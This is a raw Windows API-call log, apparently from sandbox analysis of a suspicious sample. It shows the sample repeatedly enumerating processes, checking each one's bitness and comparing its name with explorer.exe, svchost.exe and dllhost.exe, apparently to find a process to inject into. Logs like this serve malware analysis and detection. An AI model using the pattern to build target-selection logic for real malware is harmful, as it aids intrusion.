[0194.481] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0194.481] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0194.481] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0194.481] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0194.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0194.482] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.482] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.482] CloseHandle (hObject=0xec) returned 1 [0194.482] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0194.482] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0194.482] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0194.482] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0194.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0194.483] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.483] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.483] CloseHandle (hObject=0xec) returned 1 [0194.483] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0194.483] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0194.483] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0194.483] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0194.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0194.483] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.483] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.483] CloseHandle (hObject=0xec) returned 1 [0194.483] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0194.483] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0194.484] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0194.484] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0194.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0194.484] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.484] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.484] CloseHandle (hObject=0xec) returned 1 [0194.484] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0194.484] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0194.484] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0194.484] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0194.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0194.485] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.485] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.485] CloseHandle (hObject=0xec) returned 1 [0194.485] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0194.485] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0194.485] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0194.485] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0194.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0194.485] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.485] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.486] CloseHandle (hObject=0xec) returned 1 [0194.486] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0194.486] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0194.486] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0194.486] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0194.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0194.486] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.486] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.486] CloseHandle (hObject=0xec) returned 1 [0194.486] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0194.486] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0194.486] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0194.486] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0194.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0194.487] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.487] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.487] CloseHandle (hObject=0xec) returned 1 [0194.487] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0194.487] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0194.487] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0194.487] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0194.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0194.488] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.488] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.488] CloseHandle (hObject=0xec) returned 1 [0194.488] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0194.488] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0194.488] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0194.488] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0194.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0194.488] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.488] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.488] CloseHandle (hObject=0xec) returned 1 [0194.488] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0194.488] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0194.488] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0194.488] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0194.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0194.489] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.489] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.489] CloseHandle (hObject=0xec) returned 1 [0194.489] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0194.489] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0194.489] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0194.489] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0194.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0194.490] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.490] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.490] CloseHandle (hObject=0xec) returned 1 [0194.490] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0194.490] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0194.490] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0194.490] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0194.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0194.490] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.490] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.490] CloseHandle (hObject=0xec) returned 1 [0194.490] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0194.491] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0194.491] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0194.491] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0194.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0194.491] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.491] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.491] CloseHandle (hObject=0xec) returned 1 [0194.491] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0194.491] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0194.491] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0194.491] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0194.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0194.492] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0194.492] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0194.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0194.493] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0194.493] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0194.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0194.494] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0194.494] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0194.495] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.495] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.495] CloseHandle (hObject=0xec) returned 1 [0194.495] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0194.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0194.496] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.496] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.496] CloseHandle (hObject=0xec) returned 1 [0194.496] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0194.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0194.496] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0194.497] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.497] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.497] CloseHandle (hObject=0xec) returned 1 [0194.497] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0194.497] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0194.557] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.557] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.557] CloseHandle (hObject=0xec) returned 1 [0194.557] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.557] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0194.558] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.558] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.558] CloseHandle (hObject=0xec) returned 1 [0194.558] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0194.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0194.558] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.558] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0194.558] CloseHandle (hObject=0xec) returned 1 [0194.558] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0194.559] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0194.559] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0194.559] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0194.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0194.559] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0194.560] CloseHandle (hObject=0xe8) returned 1 [0194.560] Sleep (dwMilliseconds=0x3e8) [0195.586] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0195.588] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0195.589] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0195.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0195.589] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0195.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0195.590] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0195.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0195.591] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0195.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0195.591] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0195.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0195.592] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0195.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0195.592] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0195.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0195.593] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0195.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0195.593] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0195.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0195.594] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0195.594] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 